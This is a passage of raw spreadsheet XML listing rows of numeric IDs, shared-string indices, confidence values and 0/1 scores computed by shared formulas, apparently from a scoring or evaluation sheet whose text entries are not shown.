      <c r="C123" s="63" t="s">
        <v>532</v>
      </c>
      <c r="D123" s="62" t="s">
        <v>533</v>
      </c>
      <c r="E123" s="62" t="s">
        <v>534</v>
      </c>
      <c r="F123" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G123" s="62">
        <v>0.9</v>
      </c>
      <c r="H123" s="64">
        <v>1.0</v>
      </c>
      <c r="I123" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J123" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K123" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L123" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O123" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="62">
        <v>25929.0</v>
      </c>
      <c r="B124" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C124" s="63" t="s">
        <v>535</v>
      </c>
      <c r="D124" s="62" t="s">
        <v>536</v>
      </c>
      <c r="E124" s="62" t="s">
        <v>537</v>
      </c>
      <c r="F124" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G124" s="62">
        <v>0.95</v>
      </c>
      <c r="H124" s="64">
        <v>1.0</v>
      </c>
      <c r="I124" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J124" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K124" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L124" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O124" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="62">
        <v>26066.0</v>
      </c>
      <c r="B125" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C125" s="63" t="s">
        <v>538</v>
      </c>
      <c r="D125" s="62" t="s">
        <v>539</v>
      </c>
      <c r="E125" s="62" t="s">
        <v>540</v>
      </c>
      <c r="F125" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G125" s="62">
        <v>0.95</v>
      </c>
      <c r="H125" s="64">
        <v>1.0</v>
      </c>
      <c r="I125" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J125" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K125" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L125" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O125" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="62">
        <v>26283.0</v>
      </c>
      <c r="B126" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C126" s="63" t="s">
        <v>541</v>
      </c>
      <c r="D126" s="62" t="s">
        <v>542</v>
      </c>
      <c r="E126" s="62" t="s">
        <v>543</v>
      </c>
      <c r="F126" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G126" s="62">
        <v>0.85</v>
      </c>
      <c r="H126" s="64">
        <v>0.0</v>
      </c>
      <c r="I126" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J126" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K126" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L126" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O126" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="62">
        <v>26307.0</v>
      </c>
      <c r="B127" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C127" s="63" t="s">
        <v>544</v>
      </c>
      <c r="D127" s="62" t="s">
        <v>545</v>
      </c>
      <c r="E127" s="62" t="s">
        <v>546</v>
      </c>
      <c r="F127" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G127" s="62">
        <v>0.9</v>
      </c>
      <c r="H127" s="64">
        <v>1.0</v>
      </c>
      <c r="I127" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J127" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K127" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L127" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O127" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="62">
        <v>26881.0</v>
      </c>
      <c r="B128" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C128" s="63" t="s">
        <v>547</v>
      </c>
      <c r="D128" s="62" t="s">
        <v>548</v>
      </c>
      <c r="E128" s="62" t="s">
        <v>549</v>
      </c>
      <c r="F128" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G128" s="62">
        <v>0.9</v>
      </c>
      <c r="H128" s="64">
        <v>1.0</v>
      </c>
      <c r="I128" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J128" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K128" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L128" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O128" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="62">
        <v>27173.0</v>
      </c>
      <c r="B129" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C129" s="63" t="s">
        <v>550</v>
      </c>
      <c r="D129" s="62" t="s">
        <v>551</v>
      </c>
      <c r="E129" s="62" t="s">
        <v>552</v>
      </c>
      <c r="F129" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G129" s="62">
        <v>0.9</v>
      </c>
      <c r="H129" s="64">
        <v>0.0</v>
      </c>
      <c r="I129" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J129" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K129" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L129" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O129" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="62">
        <v>29115.0</v>
      </c>
      <c r="B130" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C130" s="63" t="s">
        <v>553</v>
      </c>
      <c r="D130" s="62" t="s">
        <v>554</v>
      </c>
      <c r="E130" s="62" t="s">
        <v>555</v>
      </c>
      <c r="F130" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G130" s="62">
        <v>0.9</v>
      </c>
      <c r="H130" s="64">
        <v>1.0</v>
      </c>
      <c r="I130" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J130" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K130" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L130" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O130" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="62">
        <v>29292.0</v>
      </c>
      <c r="B131" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C131" s="63" t="s">
        <v>556</v>
      </c>
      <c r="D131" s="62" t="s">
        <v>557</v>
      </c>
      <c r="E131" s="62" t="s">
        <v>558</v>
      </c>
      <c r="F131" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G131" s="62">
        <v>0.9</v>
      </c>
      <c r="H131" s="64">
        <v>1.0</v>
      </c>
      <c r="I131" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J131" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K131" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L131" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O131" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="62">
        <v>29372.0</v>
      </c>
      <c r="B132" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C132" s="63" t="s">
        <v>559</v>
      </c>
      <c r="D132" s="62" t="s">
        <v>560</v>
      </c>
      <c r="E132" s="62" t="s">
        <v>561</v>
      </c>
      <c r="F132" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G132" s="62">
        <v>0.9</v>
      </c>
      <c r="H132" s="64">
        <v>1.0</v>
      </c>
      <c r="I132" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J132" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K132" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L132" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O132" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="62">
        <v>29421.0</v>
      </c>
      <c r="B133" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C133" s="63" t="s">
        <v>562</v>
      </c>
      <c r="D133" s="62" t="s">
        <v>563</v>
      </c>
      <c r="E133" s="62" t="s">
        <v>564</v>
      </c>
      <c r="F133" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G133" s="62">
        <v>0.95</v>
      </c>
      <c r="H133" s="64">
        <v>1.0</v>
      </c>
      <c r="I133" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J133" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K133" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L133" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O133" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="62">
        <v>29424.0</v>
      </c>
      <c r="B134" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C134" s="63" t="s">
        <v>565</v>
      </c>
      <c r="D134" s="62" t="s">
        <v>566</v>
      </c>
      <c r="E134" s="62" t="s">
        <v>567</v>
      </c>
      <c r="F134" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G134" s="62">
        <v>0.9</v>
      </c>
      <c r="H134" s="64">
        <v>1.0</v>
      </c>
      <c r="I134" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J134" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K134" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L134" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O134" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="62">
        <v>29439.0</v>
      </c>
      <c r="B135" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C135" s="63" t="s">
        <v>568</v>
      </c>
      <c r="D135" s="62" t="s">
        <v>569</v>
      </c>
      <c r="E135" s="62" t="s">
        <v>570</v>
      </c>
      <c r="F135" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G135" s="62">
        <v>0.95</v>
      </c>
      <c r="H135" s="64">
        <v>1.0</v>
      </c>
      <c r="I135" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J135" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K135" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L135" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O135" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="62">
        <v>29594.0</v>
      </c>
      <c r="B136" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C136" s="63" t="s">
        <v>571</v>
      </c>
      <c r="D136" s="62" t="s">
        <v>572</v>
      </c>
      <c r="E136" s="62" t="s">
        <v>573</v>
      </c>
      <c r="F136" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G136" s="62">
        <v>0.9</v>
      </c>
      <c r="H136" s="64">
        <v>1.0</v>
      </c>
      <c r="I136" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J136" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K136" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L136" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O136" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="62">
        <v>29797.0</v>
      </c>
      <c r="B137" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C137" s="63" t="s">
        <v>574</v>
      </c>
      <c r="D137" s="62" t="s">
        <v>575</v>
      </c>
      <c r="E137" s="62" t="s">
        <v>576</v>
      </c>
      <c r="F137" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G137" s="62">
        <v>0.8</v>
      </c>
      <c r="H137" s="64" t="s">
        <v>577</v>
      </c>
      <c r="I137" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J137" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K137" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L137" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M137" s="62" t="s">
        <v>578</v>
      </c>
      <c r="N137" s="62" t="s">
        <v>579</v>
      </c>
      <c r="O137" s="62">
        <v>0.0</v>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="62">
        <v>30161.0</v>
      </c>
      <c r="B138" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C138" s="63" t="s">
        <v>580</v>
      </c>
      <c r="D138" s="62" t="s">
        <v>581</v>
      </c>
      <c r="E138" s="62" t="s">
        <v>582</v>
      </c>
      <c r="F138" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G138" s="62">
        <v>0.95</v>
      </c>
      <c r="H138" s="64">
        <v>1.0</v>
      </c>
      <c r="I138" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J138" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K138" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L138" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O138" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="62">
        <v>30432.0</v>
      </c>
      <c r="B139" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C139" s="63" t="s">
        <v>583</v>
      </c>
      <c r="D139" s="62" t="s">
        <v>584</v>
      </c>
      <c r="E139" s="62" t="s">
        <v>585</v>
      </c>
      <c r="F139" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G139" s="62">
        <v>0.9</v>
      </c>
      <c r="H139" s="64">
        <v>1.0</v>
      </c>
      <c r="I139" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J139" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K139" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L139" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O139" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="62">
        <v>30800.0</v>
      </c>
      <c r="B140" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C140" s="63" t="s">
        <v>586</v>
      </c>
      <c r="D140" s="62" t="s">
        <v>587</v>
      </c>
      <c r="E140" s="62" t="s">
        <v>588</v>
      </c>
      <c r="F140" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G140" s="62">
        <v>0.9</v>
      </c>
      <c r="H140" s="64">
        <v>0.0</v>
      </c>
      <c r="I140" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J140" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K140" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L140" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O140" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="62">
        <v>30828.0</v>
      </c>
      <c r="B141" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C141" s="63" t="s">
        <v>589</v>
      </c>
      <c r="D141" s="62" t="s">
        <v>590</v>
      </c>
      <c r="E141" s="62" t="s">
        <v>591</v>
      </c>
      <c r="F141" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G141" s="62">
        <v>0.9</v>
      </c>
      <c r="H141" s="64">
        <v>0.0</v>
      </c>
      <c r="I141" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J141" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K141" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L141" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O141" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="62">
        <v>30950.0</v>
      </c>
      <c r="B142" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C142" s="63" t="s">
        <v>592</v>
      </c>
      <c r="D142" s="62" t="s">
        <v>593</v>
      </c>
      <c r="E142" s="62" t="s">
        <v>594</v>
      </c>
      <c r="F142" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G142" s="62">
        <v>0.85</v>
      </c>
      <c r="H142" s="64">
        <v>1.0</v>
      </c>
      <c r="I142" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J142" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K142" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L142" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O142" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="62">
        <v>31015.0</v>
      </c>
      <c r="B143" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C143" s="63" t="s">
        <v>595</v>
      </c>
      <c r="D143" s="62" t="s">
        <v>596</v>
      </c>
      <c r="E143" s="62" t="s">
        <v>597</v>
      </c>
      <c r="F143" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G143" s="62">
        <v>0.95</v>
      </c>
      <c r="H143" s="64">
        <v>1.0</v>
      </c>
      <c r="I143" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J143" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K143" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L143" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O143" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="62">
        <v>31369.0</v>
      </c>
      <c r="B144" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C144" s="63" t="s">
        <v>598</v>
      </c>
      <c r="D144" s="62" t="s">
        <v>599</v>
      </c>
      <c r="E144" s="62" t="s">
        <v>600</v>
      </c>
      <c r="F144" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G144" s="62">
        <v>0.95</v>
      </c>
      <c r="H144" s="64">
        <v>1.0</v>
      </c>
      <c r="I144" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J144" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K144" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L144" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O144" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="62">
        <v>31677.0</v>
      </c>
      <c r="B145" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C145" s="63" t="s">
        <v>601</v>
      </c>
      <c r="D145" s="62" t="s">
        <v>602</v>
      </c>
      <c r="E145" s="62" t="s">
        <v>603</v>
      </c>
      <c r="F145" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G145" s="62">
        <v>0.8</v>
      </c>
      <c r="H145" s="64">
        <v>1.0</v>
      </c>
      <c r="I145" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J145" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K145" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L145" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O145" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="62">
        <v>32072.0</v>
      </c>
      <c r="B146" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C146" s="63" t="s">
        <v>604</v>
      </c>
      <c r="D146" s="62" t="s">
        <v>605</v>
      </c>
      <c r="E146" s="62" t="s">
        <v>606</v>
      </c>
      <c r="F146" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G146" s="62">
        <v>0.95</v>
      </c>
      <c r="H146" s="64">
        <v>1.0</v>
      </c>
      <c r="I146" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J146" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K146" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L146" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O146" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="62">
        <v>32096.0</v>
      </c>
      <c r="B147" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C147" s="63" t="s">
        <v>607</v>
      </c>
      <c r="D147" s="62" t="s">
        <v>608</v>
      </c>
      <c r="E147" s="62" t="s">
        <v>609</v>
      </c>
      <c r="F147" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G147" s="62">
        <v>0.95</v>
      </c>
      <c r="H147" s="64">
        <v>1.0</v>
      </c>
      <c r="I147" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J147" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K147" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L147" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O147" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="62">
        <v>32111.0</v>
      </c>
      <c r="B148" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C148" s="63" t="s">
        <v>610</v>
      </c>
      <c r="D148" s="62" t="s">
        <v>611</v>
      </c>
      <c r="E148" s="62" t="s">
        <v>612</v>
      </c>
      <c r="F148" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G148" s="62">
        <v>0.9</v>
      </c>
      <c r="H148" s="64">
        <v>1.0</v>
      </c>
      <c r="I148" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J148" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K148" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L148" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O148" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="62">
        <v>32145.0</v>
      </c>
      <c r="B149" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C149" s="63" t="s">
        <v>613</v>
      </c>
      <c r="D149" s="62" t="s">
        <v>614</v>
      </c>
      <c r="E149" s="62" t="s">
        <v>615</v>
      </c>
      <c r="F149" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G149" s="62">
        <v>0.8</v>
      </c>
      <c r="H149" s="64">
        <v>1.0</v>
      </c>
      <c r="I149" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J149" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K149" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L149" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O149" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="62">
        <v>33689.0</v>
      </c>
      <c r="B150" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C150" s="63" t="s">
        <v>616</v>
      </c>
      <c r="D150" s="62" t="s">
        <v>617</v>
      </c>
      <c r="E150" s="62" t="s">
        <v>618</v>
      </c>
      <c r="F150" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G150" s="62">
        <v>0.9</v>
      </c>
      <c r="H150" s="64">
        <v>1.0</v>
      </c>
      <c r="I150" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J150" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K150" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L150" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O150" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="62">
        <v>33949.0</v>
      </c>
      <c r="B151" s="62" t="s">
        <v>24</v>
      </c>
      <c r="C151" s="63" t="s">
        <v>619</v>
      </c>
      <c r="D151" s="62" t="s">
        <v>620</v>
      </c>
      <c r="E151" s="62" t="s">
        <v>621</v>
      </c>
      <c r="F151" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G151" s="62">
        <v>0.95</v>
      </c>
      <c r="H151" s="64">
        <v>1.0</v>
      </c>
      <c r="I151" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J151" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K151" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L151" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O151" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="62">
        <v>2826.0</v>
      </c>
      <c r="B152" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C152" s="63" t="s">
        <v>622</v>
      </c>
      <c r="D152" s="62" t="s">
        <v>623</v>
      </c>
      <c r="E152" s="62" t="s">
        <v>624</v>
      </c>
      <c r="F152" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G152" s="62">
        <v>0.95</v>
      </c>
      <c r="H152" s="64">
        <v>1.0</v>
      </c>
      <c r="I152" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J152" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K152" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L152" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O152" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="62">
        <v>2962.0</v>
      </c>
      <c r="B153" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C153" s="63" t="s">
        <v>625</v>
      </c>
      <c r="D153" s="62" t="s">
        <v>626</v>
      </c>
      <c r="E153" s="62" t="s">
        <v>627</v>
      </c>
      <c r="F153" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G153" s="62">
        <v>0.85</v>
      </c>
      <c r="H153" s="64">
        <v>1.0</v>
      </c>
      <c r="I153" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J153" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K153" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L153" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O153" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="62">
        <v>3032.0</v>
      </c>
      <c r="B154" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C154" s="63" t="s">
        <v>628</v>
      </c>
      <c r="D154" s="62" t="s">
        <v>629</v>
      </c>
      <c r="E154" s="62" t="s">
        <v>630</v>
      </c>
      <c r="F154" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G154" s="62">
        <v>0.9</v>
      </c>
      <c r="H154" s="64">
        <v>1.0</v>
      </c>
      <c r="I154" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J154" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K154" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L154" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O154" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="62">
        <v>3090.0</v>
      </c>
      <c r="B155" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C155" s="63" t="s">
        <v>631</v>
      </c>
      <c r="D155" s="62" t="s">
        <v>632</v>
      </c>
      <c r="E155" s="62" t="s">
        <v>633</v>
      </c>
      <c r="F155" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G155" s="62">
        <v>0.9</v>
      </c>
      <c r="H155" s="64">
        <v>1.0</v>
      </c>
      <c r="I155" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J155" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K155" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L155" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O155" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="62">
        <v>3110.0</v>
      </c>
      <c r="B156" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C156" s="63" t="s">
        <v>634</v>
      </c>
      <c r="D156" s="62" t="s">
        <v>635</v>
      </c>
      <c r="E156" s="62" t="s">
        <v>636</v>
      </c>
      <c r="F156" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G156" s="62">
        <v>0.95</v>
      </c>
      <c r="H156" s="64">
        <v>1.0</v>
      </c>
      <c r="I156" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J156" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K156" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L156" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
